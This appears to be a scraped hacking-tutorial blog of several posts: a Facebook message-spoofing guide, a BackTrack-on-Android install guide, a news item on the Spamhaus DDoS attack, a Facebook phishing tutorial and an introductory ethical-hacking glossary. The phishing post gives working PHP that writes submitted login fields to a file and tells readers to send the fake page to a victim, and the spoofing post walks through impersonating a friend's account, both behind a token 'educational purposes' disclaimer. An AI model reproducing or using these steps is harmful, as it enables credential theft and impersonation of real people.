Spoofing Facebook Chat

Hello friends ,
   
Today we will learn about how to send a fake message from one Facebook account to other facebook account.
Spoofing Facebook message is basically sending message to your Facebook friend from other friend Facebook id.

we need a two things for it.

  1. fake message script 

  2. web hosting

  3. victims "to" id (profileid@facebook.com)

  4. email id of a friend from which we want to send message to our victim
    (emailid@yahoo.com)
    (emailid@hotmail.com)
    (emailid@gmail.com)
    etc.

 

Now Let's Start.




step 1: First of all download a script from here. click here  password:sectorm7

Step 2: Make a hosting site for upload a script of fake message .
           here is a free hosting site name
 000webhost.com,ripway.com,110mb.com,0fees.net,t35.com,my3gb.com        etc..so make a account on any of them and login .
 
Step 3:now unzip a file and upload on web hosting site which is you download.now open browser and go to in URL and write a URL as like here. your_site_name/fake.php 
you get a fake message page.
Step 4: Fill up all details. and click on send message.
           so you get successfully send a message.

here is example. :)



WARNING:THIS IS FOR EDUCATIONAL PURPOSES ONLY...............I DO NOT STAND RESPONSIBLE FOR ANY HARM THAT OCCURS TO YOUR COMPUTER OR YOURSELF OR ANYONE DUE TO THE POSSESSION OF THIS INFORMATION.

 

Leave a Comment For Any Doubts.....
Feel Free To Leave A Comment

 


How to Install BackTrack on Android Mobile and Tablet

BackTrack is one of my favorite OS. First reason is it is made by world class hackers and second one is all hacking tools are available and last and third one, it is flavor of Linux. I can use it only on PC, Android is booming now these days... Now you can Install Back Track Linux OS on Android smartphones and tablets. Now it is possible to install and run Backtrack on your Android devices.




Requirements:
  1. Root
  2. 1GHZ processor (recommended)
  3. 512MB Ram (recommended)
  4. Android 1.6 or higher
  5. Back Track R3  click here
  6. Kernel will loop device support (this is included in most custom ROM’s)
  7. SD card with at least 3.5GB of free space
  8. Data connection on your device
  9. Following Android Apps:

    1. BUSY BOX : It acts like a installer and uninstaller.it needs root permission to run.it has CPU cores and can  run Linux kernels on android. click here
    2. Superuser : This app just grants a superuser power to your phone just like "su " does for Linux. click here
    3. Terminal Emulator : Terminal Emulator is app that runs a terminal console in android. click here
    4. Android VNC : Android VNC is a tool for viewing VNC in Android.click here




How to Install Backtrack on Android Tablet or Phone?

  1. Extract BT5-GNOME-ARM.7z to folder, for example “BT5? folder and then put on Galaxy Tab root directory. 
     
     
     
  2. Open Terminal Emulator on Galaxy Tab then go to BT5 folder with command prompt.  
    Here the command 
    cd sdcard/BT5
  3. Then run this following command and you will see
    root@localhost
    Here the command
    su
    sh bootbt




  4. Now lets run Backtrack GUI with VNC viewer
    Here the command :
    startvnc

  5. To connect wth VNC we must know the port where VNC listening. Run netstat -anpt and remember the port where VNC listening. In this case the port is 5901
     
  6. Open AndroidVNC and fill the form like this:
    Nickname : BT5
    Password : toortoor
    Address : 127.0.0.1
    Port : 5901
     
  7. Connect it and you will see Backtrack 5 interface.








Remember! Some of the Backtrack tools can’t work properly and do it for your own risk. I hope you can Install Backtrack on Android tablet without any problems, tell me if you get problems at S3ct0r M7 .

Leave a Comment For Any Doubts.....
Feel Free To Leave A Comment






    Largest Cyber-Attack In History Causes Global Internet Slowdown

    Hello ,

    If you’ve noticed that some websites have been slow recently, there’s a good reason for that. A huge distributed denial of service (DDoS) attack was launched against spam-fighting organization Spamhaus. With traffic peaking at over 300Gbps, this attack has had repercussions across the world. It’s being called the biggest cyber-attack in history.

    So, what provoked this attack? A Dutch web host named Cyberbunker was recently blacklisted by Spamhaus. Starting a little over a week ago, the anti-spam organization started getting hit with a large-scale DDoS. Reportedly, the attack would be more than enough to knock down even government infrastructure. Now, Spamhaus is accusing Cyberbunker of hiring Eastern European organized crime outfits to take down the blacklist servers in retaliation.

    By using techniques like DNS reflection, the attackers have been slamming Spamhaus for over a week. Steve Linford, CEO of Spamhaus, says that while attacks on large banks usually see peak traffic of 50Gbps, Spamhaus is seeing peaks over six times that amount. “This is definitely huge and [Spamhaus] has an infrastructure that gets hit with this stuff all the time, so for them to have issues with it makes it that much larger,” Adam Wosotowsky, Messaging Data Architect at McAfee Labs, told ExtremeTech today.

    Despite the incredible amount of traffic, Spamhaus continues to operate. By working with cloud optimization and security company CloudFlare, the service has remained up and functional, for the most part. By load-balancing the incoming traffic to 23 different data centers across the globe, the attack was effectively diluted.

    So Spamhaus got hit with a big attack, but it survived. Big deal, right? Well, unfortunately all of this illicit traffic is having a damaging effect on connection speeds. Netflix, which relies on content delivery networks (CDNs) around the world, is seeing substantial slowdown thanks to the congestion caused by the attack. While the slowdown is far from universal, it is worrisome. If a single attack against an anti-spam company can throw a monkey wrench into the internet,
    what would all-out cyberwar do?

    We’ve covered the threat of cyber-attacks from China in the past. The United States has even been accused of attacking allies. If a large scale attack were to hit the US, be it from hacking or DDoS, entire industries could crumble. This gigantic attack is just a pissed-off web host giving some “payback” to a spam blocker. What if a terrorist organization or rogue state decided to try to take out infrastructure?
    TCP/IP and DNS are resilient, but they aren’t perfect. Interrupt the internet and the first world would drop to its knees.

    Facebook hacking using Phishing method

    Hello friends ,
    Today we will learn about how to hack a facebook account and any other type of account using the phishing method.

    we need two things.
    1. Facebook login page.
    2. A Phishing Script.
    so,follow as this step.

    step1 : go to facebook login page.

    step2 : right click on page ..as show in image.



    step3 : open notepad and copy all code in notpad after find (CTRL+F) as like show in image 

       
    step4 : remove this part and write as like this.


    and save it index.html

    step5 : open notepad and write this code in notepad

    code is :

    <?
    header("Location:http://www.facebook.com/");
    $handle = fopen("ms.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>


    and save it password.php
     so now you have 2 files.
    1. index.html
    2. password.php
    step6 :  now we need a hosting site for upload a fake page ..
               here is a free hosting site name
                000webhost.com , ripway.com , 110mb.com , 0fees.net , t35.com , my3gb.com etc..
    so make a account on any of them and login .

    step7 : now upload this 2 files  ( index.html , password.php ).
    now open your site u get a login page..your fake page is ready.

    step8 : send this link your victim.

    Enjoy the moment...
    Hacking is not Crime........

    WARNING:THIS IS FOR EDUCATIONAL PURPOSES ONLY...............I DO NOT STAND RESPONSIBLE FOR ANY HARM THAT OCCURS TO YOUR COMPUTER OR YOURSELF OR ANYONE DUE TO THE POSSESSION OF THIS INFORMATION.

    Ethical Hacking Part-2


    Types Of Hacking:

    Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs

    Remote Hacking: Remote hacking is done on a remote system using Internet.

    Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

    Terminologies Used Under Hacking:

    Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

    An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.
    Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.

    Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.

    Attack: An attack occurs when a system is compromised based on a vulnerability.


    Types Of Attack:

    1.Operating System Attack
    2.Application level Attack
    3.Shrink Wrap Code Attack
    4.Misconfiguration Attack

    Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.


    Work Of An Ethical Hacker:
    Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.

    Skills Required For A Hacker
    Following are some must know things for a hacker or you can say requirements of hacker.

    Operating System:
    As a hacker you must have upper hand skills in Operating systems Windows, Linux and Unix. Once you master Linux and Unix you'll hardly face problem getting yourself on MAC. As we'll move further we will cover both of them in short and then slowly move our level to advanced.

    Networking:
    A hacker must have expertise in field of networking even if you don't have them you must be knowing about some basic terms used in networking. Please click on following links and try to grasp topics as thoroughly as you can.


    OSI Model/Internet Protocol Stack (http://en.wikipedia.org/wiki/OSI_model)
    Network Topology (http://en.wikipedia.org/wiki/Network_topology)


    The reality is that a hacker should know networking to best level. Just knowing above terms is not sufficient though you'll not encounter that much problem while learning. We still recommend you buying a book on networking that should cover networking to level of pin points. My personal favor is to book Data Communication And Networking by Behrouz Forouzan if you want to start. Click on following link to know more, read people's view or if you want to purchase.


    Data Communications and Networking (McGraw-Hill Forouzan Networking)
    (https://www.amazon.com/dp/0072923547/ref=as_li_ss_til?tag=dolod-20&camp=0&creative=0&linkCode=as4&creativeASIN=0072923547&adid=1VVN3A0Q6J4E1PNBYKZ8&)


    Knowledge About Setting Up And Configuring Servers:
    Yes that is necessary for a hacker so when we will move ahead with flow. We will cover configuring IIS 7, Apache, Vertrigo on Windows and Apache on Linux. Both HTTP and FTP servers will be covered.

    Programming:
    Absolutely no one can deny all best hackers in world have master hand in programming. Following are must know programming languages but you can even make things work even if you don't know them. In any case I would recommend you learn programming.
    HTML, C, C++, Java, SQL, Python, Perl, PHP and Ruby.
    At most basic level my advise will be you must know HTML, C, SQL, PHP and ruby.

    Tools:
    Backtrack is platform which is specially crafted and designed for penetration testing. Metasploit is framework that is used to create and experiment with exploits and payloads. Both are must for a hacker today. Alternative to Backtrack is Knoppix Security Edition and Mautrix, if you master Bactrack you'll easily master both of them. So I will not leave them apart from our list, we'll also cover them.
    Steps Involved In Hacking:
    As mentioned earlier ethical hacker takes same steps as malicious hacker. Following are different steps that are performed during hacking.

    1.Reconnaissance:
    This step involves gathering potential information about target system. In fact hacker spends 90% of time for this phase only and next 10% time for rest of the steps.

    2.Scanning:
    During this phase network is scanned for vulnerability.

    3.Gaining Access:
    This is the step where real hacking takes place. Hacker takes advantage of vulnerability found in scanning phase and penetrates the victim system.

    4.Maintaining Access:
    After gaining access hacker makes provision to come back by planting root-kit and backdoor.

    5.Covering Tracks:
    In this phase hacker removes all traces of his/her presence in system by removing log files and event logs.